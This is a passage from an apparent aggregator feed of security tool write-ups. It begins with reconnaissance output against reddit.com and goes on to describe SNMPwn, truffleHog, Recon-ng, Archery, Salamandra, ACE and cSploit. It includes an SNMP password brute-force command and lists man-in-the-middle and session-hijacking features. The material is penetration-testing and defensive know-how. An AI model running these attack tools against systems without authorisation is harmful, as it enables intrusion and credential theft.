TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
TLS_RSA_WITH_AES_128_GCM_SHA256
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256
TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
TLS_RSA_WITH_AES_128_CBC_SHA
TLS_RSA_WITH_3DES_EDE_CBC_SHA
* Certificate Information:
Content
SHA1 Fingerprint: f8d1965323111e86e6874aa93cc7c52969fb22bf
Common Name: *.reddit.com
Issuer: DigiCert SHA2 Secure Server CA
Serial Number: 11711178161886346105980166697563149367
Not Before: 2015-08-17 00:00:00
Not After: 2018-08-21 12:00:00
Signature Algorithm: sha256
Public Key Algorithm: RSA
Key Size: 2048
Exponent: 65537 (0x10001)
DNS Subject Alternative Names: ['*.reddit.com', 'reddit.com', '*.redditmedia.com', 'engine.a.redditmedia.com', 'redditmedia.com', '*.redd.it', 'redd.it', 'www.redditstatic.com', 'imgless.reddituploads.com', 'i.reddituploads.com', '*.thumbs.redditmedia.com']

Trust
Hostname Validation: OK - Certificate matches reddit.com
AOSP CA Store (7.0.0 r1): OK - Certificate is trusted
Apple CA Store (OS X 10.11.6): OK - Certificate is trusted
Java 7 CA Store (Update 79): OK - Certificate is trusted
Microsoft CA Store (09/2016): OK - Certificate is trusted
Mozilla CA Store (09/2016): OK - Certificate is trusted
Received Chain: *.reddit.com --> DigiCert SHA2 Secure Server CA
Verified Chain: *.reddit.com --> DigiCert SHA2 Secure Server CA --> DigiCert Global Root CA
Received Chain Contains Anchor: OK - Anchor certificate not sent
Received Chain Order: OK - Order is valid
Verified Chain contains SHA1: OK - No SHA1-signed certificate in the verified certificate chain

OCSP Stapling
OCSP Response Status: successful
Validation w/ Mozilla Store: OK - Response is trusted
Responder Id: 0F80611C823161D52F28E78D4638B42CE1C6D9E2
Cert Status: good
Cert Serial Number: 08CF7DA9B222C9D983C50D993F2F5437
This Update: Dec 16 16:20:41 2017 GMT
Next Update: Dec 23 15:35:41 2017 GMT
* OpenSSL Heartbleed:
OK - Not vulnerable to Heartbleed
* HTTP Security Headers:
NOT SUPPORTED - Server did not send an HSTS header

HTTP Public Key Pinning (HPKP)
NOT SUPPORTED - Server did not send an HPKP header

Computed HPKP Pins for Current Chain
0 - *.reddit.com 3FUu+FYb3IyHxicQEMs5sSzs207fuv25p7NGRIPDaAw=
1 - DigiCert SHA2 Secure Server CA 5kJvNEMw0KjrCAu7eXY5HZdvyCS13BbA0VJG1RSP91w=
2 - DigiCert Global Root CA r/mIkG3eEpVdm+u/ko/cwxzOMo1bk4TyHIlByibiA5E=
Searching Shodan.io for additional information
Server Location: San Francisco, US - 94107
ISP or Hosting Company: Fastly
To run a DNSSEC subdomain enumeration, Anubis must be run as root
Starting Nmap Scan
Host : 151.101.65.140 ()
----------
Protocol: tcp
port: 80 state: open
port: 443 state: open
Found 195 subdomains
----------------
nm.reddit.com
ne.reddit.com
sonics.reddit.com
aj.reddit.com
fo.reddit.com
f5.reddit.com
... (truncated for readability)
Sending to AnubisDB
Subdomain search took 0:00:26.579

Running the tests
Run all test with coverage
 python3 setup.py test
Run tests on their own, in native pytest environment
pytest



Acknowledgments


SNMPwn - An SNMPv3 User Enumerator and Attack tool

$
0
0
SNMPwn is an SNMPv3 user enumerator and attack tool. It is a legitimate security tool designed to be used by security professionals and penetration testers against hosts you have permission to test. It takes advantage of the fact that SNMPv3 systems will respond with "Unknown user name" when an SNMP user does not exist, allowing us to cycle through large lists of users to find the ones that do.

What does it do?
  • Checks that the hosts you provide are responding to SNMP requests.
  • Enumerates SNMP users by testing each in the list you provide. Think user brute forcing.
  • Attacks the server with the enumerated accounts and your list of passwords and encryption passwords. No need to attack the entire list of users, only live accounts.
  • Attacks all the different protocol types:
    • No auth no encryption (noauth)
    • Authentication, no encryption (authnopriv)
    • Authentication and encryption (All types supported, MD5, SHA, DES, AES) - (authpriv)

Notes for usage
Built for and tested on Kali Linux 2.x rolling. Should work on any Linux platform but does not work currently on Mac OSX, but will when I get around to it. This is due to the stdout messages for snmpwalk on OSX being different. This script basically wraps snmpwalk. The version of snmpwalk I used was 5.7.3.

Install
Clone the repo
gem install bundler
bundle install (from inside the snmpwn directory) Built for Ruby 2.3.x. Older versions of Ruby may work, but older than 1.9 may not. You may need to chmod u+x snmpwn before running.

Run
You need to provide the script a list of users, a hosts list, a password list and an encryption password list. Basic users.txt and passwords.txt files are included. You could use passwords.txt for your encryption list also. I would recommend generating one specific to the organisation you are pen testing. The command line options are available via --help as always and should be clear enough. The only ones I would make specific comment on are: --showfail - This will show you all password attack attempts, both successful and failed. It clutters the console output though, so if you do not choose this option you will get a spinning progress indicator instead. --timeout - This is the timeout in milliseconds for the command response, which in this case is snmpwalk. It is set to 0.3 by default, which is 300 milliseconds. If you are testing hosts across a slow link you are going to want to extend this. I wouldn't personally go lower than 300 or results may become unreliable.
./snmpwn.rb --hosts hosts.txt --users users.txt --passlist passwords.txt --enclist passwords.txt

Screengrabs

User Enumeration:

Password Attacks:

Summary of results:



truffleHog - Searches Through Git Repositories For High Entropy Strings And Secrets, Digging Deep Into Commit History

$
0
0

Searches through git repositories for secrets, digging deep into commit history and branches. This is effective at finding secrets accidentally committed.

NEW
Trufflehog previously functioned by running entropy checks on git diffs. This functionality still exists, but high signal regex checks have been added, and the ability to surpress entropy checking has also been added.
These features help cut down on noise, and makes the tool easier to shove into a devops pipeline.
truffleHog --regex --entropy=False https://github.com/dxa4481/truffleHog.git
or
truffleHog file:///user/dxa4481/codeprojects/truffleHog/



Install
pip install truffleHog

Customizing
Custom regexes can be added to the following file:
truffleHog/truffleHog/regexChecks.py
Things like subdomain enumeration, s3 bucket detection, and other useful regexes highly custom to the situation can be added.
Feel free to also contribute high signal regexes upstream that you think will benifit the community. Things like Azure keys, Twilio keys, Google Compute keys, are welcome, provided a high signal regex can be constructed.

How it works
This module will go through the entire commit history of each branch, and check each diff from each commit, and check for secrets. This is both by regex and by entropy. For entropy checks, trufflehog will evaluate the shannon entropy for both the base64 char set and hexidecimal char set for every blob of text greater than 20 characters comprised of those character sets in each diff. If at any point a high entropy string >20 characters is detected, it will print to the screen.

Help
Find secrets hidden in the depths of git.

positional arguments:
git_url URL for secret searching

optional arguments:
-h, --help show this help message and exit
--json Output in JSON
--regex Enable high signal regex checks
--entropy DO_ENTROPY Enable entropy checks
--since_commit SINCE_COMMIT
Only scan from a given commit hash
--max_depth MAX_DEPTH
The max commit depth to go back when searching for
secrets



Recon-ng - Full-Featured Web Reconnaissance Framework

$
0
0

Recon-ng is a full-featured Web Reconnaissance framework written in Python. Complete with independent modules, database interaction, built in convenience functions, interactive help, and command completion, Recon-ng provides a powerful environment in which open source web-based reconnaissance can be conducted quickly and thoroughly.

Recon-ng has a look and feel similar to the Metasploit Framework, reducing the learning curve for leveraging the framework. However, it is quite different. Recon-ng is not intended to compete with existing frameworks, as it is designed exclusively for web-based open source reconnaissance. If you want to exploit, use the Metasploit Framework. If you want to social engineer, use the Social-Engineer Toolkit. If you want to conduct reconnaissance, use Recon-ng! See the Usage Guide for more information.

Recon-ng is a completely modular framework and makes it easy for even the newest of Python developers to contribute. Each module is a subclass of the "module" class. The "module" class is a customized "cmd" interpreter equipped with built-in functionality that provides simple interfaces to common tasks such as standardizing output, interacting with the database, making web requests, and managing API keys. Therefore, all the hard work has been done. Building modules is simple and takes little more than a few minutes. See the Development Guide for more information.

Getting Started


Installation - Kali Linux

  • Install Recon-ng
      apt-get update && apt-get install recon-ng

    Installation - Source
    • Clone the Recon-ng repository.
        git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git
    • Change into the Recon-ng directory.
        cd recon-ng
      • Install dependencies.
          pip install -r REQUIREMENTS

        • Launch Recon-ng.
            ./recon-ng
          • Use the "-h" switch for information on runtime options.
              ./recon-ng -h

            • Helpful Resources

              Dependencies
              • All 3rd party libraries/packages should be installed prior to use. The framework checks for the presence of dependencies at runtime and disables the modules affected by missing dependencies.

              Usage Notes

              Below are a few helpful nuggets for getting started with the Recon-ng framework. While not all features are covered, the following notes will help make sense of a few of the frameworks more helpful and complex features.
              • Users will likely create and share custom modules that are not merged into the master branch of the framework. In order to allow for the use of these modules without interfering with installed package, the framework allows for the use of a custom module tree placed in the user's "home" directory. In order to leverage this feature, a directory named "modules" must be created underneath the ".recon-ng" directory, i.e. "~/.recon-ng/modules/". Custom modules that are added to the "~/.recon-ng/modules/" directory are loaded into the framework at runtime. Where the modules are placed underneath the "~/.recon-ng/modules/" directory doesn't affect functionality, but things will look much nicer in the framework if the proper module directory tree is replicated and the modules are placed in the proper category.
              • Modules are organized to facilitate the flow of a penetration test, and there are separate module branches within the module tree for each methodology step. Reconnaissance, Discovery, Exploitation and Reporting are steps 1, 3, 4 and 5 of the Web Application Penetration Testing Methodology. Therefore, each of these steps has their own branch in the module tree. It is important to understand the difference between Reconnaissance and Discovery. Reconnaissance is the use of open sources to gain information about a target, commonly referred to as "passive reconnaissance". Discovery, commonly referred to as "active reconnaissance", occurs when packets are explicitly sent to the target network in an attempt to "discover" vulnerabilities. While Recon-ng is a reconnaissance framework, elements from the other steps of the methodology will be included as a convenient place to leverage the power of Python.
              • After loading a module, the context of the framework changes, and a new set of commands and options are available. These commands and options are unique to the module. Use the "help" and "show" commands to gain familiarity with the framework and available commands and options at the root (global) and module contexts.
              • The "info" and "source" subcommands of "show" (available only in the module context) are particularly helpful ways to discover the capabilities of the framework. The "show info" command will return detailed information about the loaded module, and the "show source" command will display its source code. Spend some time exploring modules with the "show info" and "show source" commands to get a sense for how information flows through the framework.
              • The "query" command assists in managing and understanding the data stored in the database. Users are expected to know and understand Structured Query Language (SQL) in order to interact with the database via the "query" command. The "show schema" command provides a graphical representation of the database schema to assist in building SQL queries. The "show schema" command creates the graphical representation dynamically, so as the schema of the database changes, so will the result of the command.
              • Pay attention to the global options, as they have changed over time and have a large impact on the performance of the framework. Many of the online tutorials regarding Recon-ng are outdated and misrepresent the purpose of Global options as they stand now. Global options are the options that are available at the root (global) context of the framework and have a global effect on how the framework operates. Global options such as "VERBOSITY" and "PROXY" drastically change how the modules present feedback and make web requests. Explore and understand the global options before diving into the modules.
              • The modular nature of the framework requires frequently switching between modules and setting options unique to each one. It can become taxing having to repeatedly set module options as information flows through the framework. Therefore, option values for all contexts within the framework are stored locally and loaded dynamically each time the context is loaded. This provides persistence to the configuration of the framework between sessions.
              • Workspaces help users to conduct multiple simultaneous engagements without having to repeatedly configure global options or databases. All of the information for each workspace is stored in its own directory underneath the "~/.recon-ng/workspaces/" folder. Each workspace consists of its own instance of the Recon-ng database, a configuration file for the storage of configuration options, reports from reporting modules, and any loot that is gathered from other modules. To create a new workspace, use the "workspaces" command, workspaces add <name>. Loading an existing workspace is just as easy, workspaces select <name>. To view a list of available workspaces, see the "workspaces list" command or the "show workspaces" alias. To delete a workspace, use the "workspaces delete" command, workspaces delete <name>. Workspaces can also be created or loaded at runtime by invoking the "-w <workspace>" argument when executing Recon-ng, ./recon-ng -w bhis.
              • The "search" command provides the capability to search the names of all loaded modules and present the matches to the user. The "search" command can be very helpful in determining what to do next with the information that has been harvested, or identifying what is required to get the desired information. The "recon" branch of the module tree follows the following path structure: recon/<input table>-<output table>/<module>. This provides simplicity in determining what module is available for the action the user wants to take next. To see all of the modules which accept a domain as input, search for the input table name "domains" followed by a dash: search domains-. To see all of the modules which result in harvested hosts, search for the output table name "hosts" with a preceding dash: search -hosts.
              • The entire framework is equipped with command completion. Whether exploring standard commands, or passing parameters to commands, tap the "tab" key several times to be presented with all of the available options for that command or parameter.
              • Even with command completion, module loading can be cumbersome because of the directory structure of the module tree. To make module loading easier, the framework is equipped with a smart loading feature. This feature allows modules to be loaded by referring to a keyword unique to the desired module's name. For instance, use namechk will load the "recon/contacts-contacts/namechk" module without requiring the full path since it is the only module containing the string "namechk". Attempting to smart load with a string that exists in more than one module name will result in a list of all possible modules for the given keyword. For example, there are many modules whose names contain the string "pwned". Therefore, the command use pwned would not load a module, but return a list of possible modules for the user to reference by full module name.
              • Every piece of information stored in the Recon-ng database is a potential input "seed" from which new information can be harvested. The "add" command allows users to add initial records to the database which will become input for modules. Modules take the seed data, transform it into other data types, and store the data in the database as potential input for other modules. Each module has a "SOURCE" option which determines the seed data. The "SOURCE" option provides flexibility in what the user can provide to modules as input. The "SOURCE" option allows users to select "default", which is seed data from the database as determined by the module developer, a single entry as a string, the path to a file, or a custom SQL query. The framework will detect the source and provide it as input to the module. Changing the "SOURCE" option of a module does not affect how the module handles the resulting information.
              • While the "shell" command and "!" alias give users the ability to run system commands on the local machine from within the framework, neither of these commands is necessary to achieve this functionality. Any input that the framework does not understand as a framework command is executed as a system command. Therefore, the only time that "shell" or "!" is necessary is when the desired command shares the same name as a framework command.
              • A recorded session of all activity is essential for many penetration testers, but built-in OS tools like "tee" and "script" break needed functionality, like tab completion, and muck with output formatting. To solve this dilemma, the framework is equipped with the ability to spool all activity to a file for safe keeping. The "spool" command gives users the ability to start and stop spooling, or check the current spooling status. The destination file for the spooled data is set as a parameter of the "spool start" command, spool start <filename>. Use help spool for more information on the "spool" command.
              • Backing up data at important points during the reconnaissance process helps to prevent the loss or corruption of data due to unexpected resource behavior. The "snapshots" command gives users the ability to backup and restore snapshots of the database. Use help snapshots for more information on the "snapshots" command. 


              Archery - Open Source Vulnerability Assessment And Management Helps Developers And Pentesters To Perform Scans And Manage Vulnerabilities

              $
              0
              0

              Archery is an opensource vulnerability assessment and management tool which helps developers and pentesters to perform scans and manage vulnerabilities. Archery uses popular opensource tools to perform comprehensive scaning for web application and network. It also performs web application dynamic authenticated scanning and covers the whole applications by using selenium. The developers can also utilize the tool for implementation of their DevOps CI/CD environment.

              Demo


              Overview of the tool:
              • Perform Web and Network vulnerability Scanning using opensource tools.
              • Correlates and Collaborate all raw scans data, show them in a consolidated manner.
              • Perform authenticated web scanning.
              • Perform web application scanning using selenium.
              • Vulnerability Managment.
              • Enable REST API's for developers to perform scaning and Vulnerability Managment.
              • Useful for DevOps teams for Vulnerability Managment.

              Note
              Currently project is in developement phase and still lot of work going on.

              Requirement

              Installation
              $ git clone https://github.com/anandtiwarics/archerysec.git
              $ cd /archerysecurity
              $ pip install -r requirements.txt
              $ python manage.py collectstatic
              $ python manage.py makemigrations networkscanners
              $ python manage.py makemigrations webscanners
              $ python manage.py makemigrations projects
              $ python manage.py migrate
              $ python manage.py createsuperuser
              $ python manage.py runserver
              Note: Make sure these steps (except createsuperuser) should be perform after every git pull.

              Setup Setting
              Zap Setting
              1. Go to Setting Page
              2. Edit ZAP setting or navigate URL : http://host:port/setting_edit/
              3. Fill all required information and click on save.
              OpenVAS Setting
              1. Go to setting Page
              2. Edit OpenVAS setting or navigate URL : http://host:port/networkscanners/openvas_setting
              3. Fill all required information and click on save.

              Road Map
              • API Automated vulnerability scanning.
              • Perform Reconnaissance before scanning.
              • Concurrent Scans.
              • Vulnerability POC pictures.
              • Cloud Security scanning.
              • Dashboards
              • Easy to installing.


              Salamandra - Spy Microphone Detection Tool

              $
              0
              0

              Salamandra is a tool to detect and locate spy microphones in closed environments. It find microphones based on the strength of the signal sent by the microphone and the amount of noise and overlapped frequencies. Based on the generated noise it can estimate how close or far away you are from the microphone.

              Installation

              USB SDR Device
              To use Salamandra you nee to have a SDR (Software Define Radio) device. It can be any from the cheap USB devices, such as this.

              rtl_power software
              Salamandra needs the rtl_power software installed in your computer. To install it you can do:
              • On MacOS:
                sudo port install rtl-sdr
              If you don't have ports in your MAC, see port installation
              If rtl_power was installed correctly, you should be able to run this command in any console:
              rtl_test
              And you should see one device detected.

              Usage

              Basic usage for detecting microphones
              ./salamandra.py 
              This command will use a default threshold of 10.8, a min freq of 100Mhz, a max freq of 400Mhz and sound. You can change the default values with parameters.

              Location Mode to find Hidden Microphones
              • Run Salamandra with a threshold of 0, starting in the frequency 100MHz and ending in the frequency 200MHz. Search is activated with (-s). And make sounds (-S)
                ./salamandra.py -t 0 -a 100 -b 200 -s -S

              Location Mode from a stored rtl_power file
              ./salamandra.py -t 0 -a 111 -b 113 -s -f stored.csv
              To actually create the file with rtl_power, from 111MHz to 114MHz, with 4000Khz step, gain of 25, integration of 1s and capturing for 5min, you can do:
              rtl_power -f 111M:114M:4000Khz -g 25 -i 1 -e 300 stored.csv

              Detection Mode (deprecated now). To detect microphones in one pass.
              • Run Salamandra with a threshold of 0, starting in the frequency 100MHz and ending in the frequency 200MHz. Search is activated with (-s). And make sounds (-S)
                ./salamandra.py -t 10.3 -a 100 -b 200 -F 2

              Tips
              • The wider the range of frequencies selected, the longer the analysis takes.
              • The wider the range, the more probabilities to find microphones.
              • Once you know the prob freq you can narrow it down with the parameters.

              TODO
              1. Make more clear if there is a detection or not
              2. Separate the FP by
                • Sound generation based on the length of the histogram
                • Discard the frequencies that do not look like analog audio (Equidistant freqs)
              3. Logs in file
              4. Make the execution of rtl_power in another process in the background


              ACE - Automated, Collection, and Enrichment Platform

              $
              0
              0

              The Automated Collection and Enrichment (ACE) platform is a suite of tools for threat hunters to collect data from many endpoints in a network and automatically enrich the data. The data is collected by running scripts on each computer without installing any software on the target. ACE supports collecting from Windows, macOS, and Linux hosts.
              ACE is meant to simplify the process of remotely collecting data across an environment by offering credential management, scheduling, centralized script management, and remote file downloading. ACE is designed to complement a SIEM by collecting data and enriching data; final analysis is best suited for SIEM tools such as Splunk, ELK, or the tools the analyst prefers.

              Why use ACE?
              ACE grew out of the need to perform Compromise Assessments in places with common restrictions:
              • A dedicated software agent can’t be installed on the target hosts.
              • Copying and running executables (such as Sysinternals tools) is not feasible.
              • The customer cannot enable Windows Remoting (WinRM).
              • The customer’s visibility into macOS/Linux hosts is limited or nonexistent.
              • New scripts/tools must be created for customer-specific data.
              • Network segmentation requires multiple credentials to access all machines in the environment.

              Installation/What is the architecture of ACE?
              ACE has three components: the ACE Web Service, the ACE SQL database, and the ACE RabbitMQ message queue. The Web Service is a RESTful API that takes requests from clients to schedule and manage scans. The SQL database stores the configuration and data from scans. The RabbitMQ service handles automated enrichment of data.
              Each of the services can be deployed on separate machines, or all on a single server. You can use the provided Docker images to easily deploy premade ACE services.

              Usage/How do I use ACE?
              The ACE repository includes a collection of PowerShell scripts to interact with the ACE Web Service, including adding users, managing credentials, uploading collection scripts, and scheduling scans.
              After deploying the ACE servers, use New-AceUser to create a new ACE user.
              Remove the default “Admin” user with Remove-AceUser.
              Use New-AceCredential to enter a set of credentials.
              Run Start-AceDiscovery to automatically find computers on the Windows domain.
              Run Start-AceSweep to start a sweep to run the selected scripts across the discovered endpoints.

              How do I add scripts to ACE?
              ACE Scripts should be self-contained scripts to collect data. They should return JSON object with the data to be collected. You can use ConvertTo-JsonV2 cmdlet in ACE to convert PSObjects into JSON objects in a PowerShell V2 compatible way.
              We recommend PSReflect to access the Native/Win32 API in-memory in a PowerShell V2 compatible way. See Get-InjectedThread for a usage example.
              Use New-ACEScript to upload a new script to ACE. The new script can be added to existing scheduled sweeps or incorporated into new sweeps.
              [script design considerations]

              What targets are supported by ACE?
              The included collection scripts are designed to be PowerShell V2+ and Python 2.7 compatible, and should work on Windows 7/Server 2008 R2 and newer, and most versions of macOS and Linux.

              More Resources
              Contributing Contributions to ACE are always welcome.


              cSploit Android - The most complete and advanced IT security professional toolkit on Android

              $
              0
              0

              cSploit is a free/libre and open source (GPLed) Android network analysis and penetration suite which aims to be the most complete and advanced professional toolkit for IT security experts/geeks to perform network security assessments on a mobile device.
              See more at www.cSploit.org.

              Features
              • Map your local network
              • Fingerprint hosts' operating systems and open ports
              • Add your own hosts outside the local network
              • Integrated traceroute
              • Integrated Metasploit framework RPCd
                • Search hosts for known vulnerabilities via integrated Metasploit daemon
                • Adjust exploit settings, launch, and create shell consoles on exploited systems
                • More coming
              • Forge TCP/UDP packets
              • Perform man in the middle attacks (MITM) including:
                • Image, text, and video replacement-- replace your own content on unencrypted web pages
                • JavaScript injection-- add your own javascript to unencrypted web pages.
                • password sniffing ( with common protocols dissection )
                • Capture pcap network traffic files
                • Real time traffic manipulation to replace images/text/inject into web pages
                • DNS spoofing to redirect traffic to different domain
                • Break existing connections
                • Redirect traffic to another address
                • Session Hijacking-- listen for unencrypted cookies and clone them to take Web session

              Tutorials:

              Also see the wiki for instructions on building, reporting issues, and more.

              Requirements
              • A ROOTED Android version 2.3 (Gingerbread) or a newer version
              • The Android OS must have a BusyBoxfull installation with every utility installed (not the partial installation). If you do not have busybox already, you can get it here or here (note cSploit does not endorse any busybox installer, these are just two we found).
              • You must install SuperSU (it will work only if you have it)


              Viewing all 5854 articles
              Browse latest View live


              <script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>